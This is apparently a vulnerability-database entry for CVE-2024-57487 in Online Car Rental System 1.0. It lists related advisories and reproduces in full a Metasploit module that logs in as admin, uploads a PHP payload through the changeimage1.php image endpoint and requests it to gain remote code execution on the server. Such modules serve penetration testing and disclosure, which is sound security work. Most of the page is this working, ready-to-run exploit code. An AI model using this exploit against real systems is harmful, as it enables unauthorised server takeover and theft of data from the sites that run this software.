📄 Car Rental System 1.0 Shell Upload

🗓️ 14 May 2025 00:00:00Reported by Aaryan GolatkarType

Authenticated remote code execution in Car Rental System 1.0 through changeimage1.php file upload.

Reporter	Title	Published	Views	Family All 17
GithubExploit	Exploit for Code Injection in Code-Projects Online_Car_Rental_System	10 Jan 202516:06	–	githubexploit
Circl	CVE-2024-57487	10 Jan 202522:00	–	circl
CNNVD	Code-Projects Online Car Rental System 安全漏洞	13 Jan 202500:00	–	cnnvd
CNNVD	Code-Projects Online Car Rental System 安全漏洞	13 Jan 202500:00	–	cnnvd
CVE	CVE-2024-57487	13 Jan 202500:00	–	cve
Cvelist	CVE-2024-57487	13 Jan 202500:00	–	cvelist
Cvelist	CVE-2024-57488	13 Jan 202500:00	–	cvelist
EUVD	EUVD-2024-53601	3 Oct 202520:07	–	euvd
Metasploit	Car Rental System 1.0 File Upload RCE (Authenticated)	14 May 202518:50	–	metasploit
NVD	CVE-2024-57487	13 Jan 202517:15	–	nvd

##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = NormalRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::PhpEXE
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Car Rental System 1.0 File Upload RCE (Authenticated)',
            'Description' => %q{
              This module exploits an authenticated remote code execution vulnerability in the
              Online Car Rental System 1.0 via the `changeimage1.php` endpoint. An authenticated
              attacker can upload malicious PHP scripts without proper validation, enabling
              arbitrary code execution on the server.
            },
            'Author' => ['Aaryan Golatkar'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2024-57487'],
              ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-57487'],
            ],
            'DisclosureDate' => '2025-01-13',
            'Platform' => 'php',
            'Arch' => ARCH_PHP,
            'Privileged' => false,
            'Targets' => [['Automatic', {}]],
            'DefaultTarget' => 0,
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options(
          [
            OptString.new('TARGETURI', [true, 'Base path to Online Car Rental System', '/']),
            OptString.new('USERNAME', [true, 'The admin username', 'admin']),
            OptString.new('PASSWORD', [true, 'The admin password', 'Test@12345']),
          ]
        )
      end
    
      def check
        res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'admin/'))
        return CheckCode::Unknown('Failed to access the target.') unless res&.code == 200
    
        if res.body.include?('Car Rental Portal')
          return CheckCode::Detected('The target appears to be the Online Car Rental System.')
        end
    
        CheckCode::Safe('Online Car Rental System not detected')
      end
    
      def login
        print_status('Attempting to authenticate...')
        res = send_request_cgi(
          'uri' => normalize_uri(target_uri.path, 'admin/'),
          'method' => 'POST',
          'vars_post' => {
            'username' => datastore['USERNAME'],
            'password' => datastore['PASSWORD'],
            'login' => ''
          },
          'keep_cookies' => true
        )
    
        unless res&.code == 200 && res.get_cookies.include?('PHPSESSID')
          fail_with(Failure::NoAccess, 'Failed to authenticate with the target.')
        end
    
        print_good('Authentication successful.')
      end
    
      def upload_shell
        payload_name = "#{Rex::Text.rand_text_alphanumeric(5)}.php"
        payload = get_write_exec_payload(unlink_self: true)
    
        print_status("Uploading payload as #{payload_name}...")
    
        post_data = Rex::MIME::Message.new
        post_data.add_part(payload, 'application/x-php', nil, "form-data; name=\"img1\"; filename=\"#{payload_name}\"")
        post_data.add_part('', nil, nil, 'form-data; name="update"')
    
        res = send_request_cgi(
          'uri' => normalize_uri(target_uri.path, 'admin/changeimage1.php'),
          'method' => 'POST',
          'headers' => { 'Content-Type' => "multipart/form-data; boundary=#{post_data.bound}" },
          'vars_get' => { imgid: '1' },
          'data' => post_data.to_s
        )
    
        fail_with(Failure::UnexpectedReply, 'Failed to upload payload.') unless res&.code == 200
    
        print_good('Payload uploaded successfully.')
        payload_name
      end
    
      def exploit
        login
        payload_name = upload_shell
        payload_url = normalize_uri(target_uri.path, "admin/img/vehicleimages/#{payload_name}")
    
        print_status("Executing payload at #{payload_url}...")
        send_request_cgi(
          'uri' => payload_url,
          'method' => 'GET'
        )
      end
    end

14 May 2025 00:00Current

9High risk

Vulners AI Score9

CVSS 3.16.5

EPSS0.51625

SSVC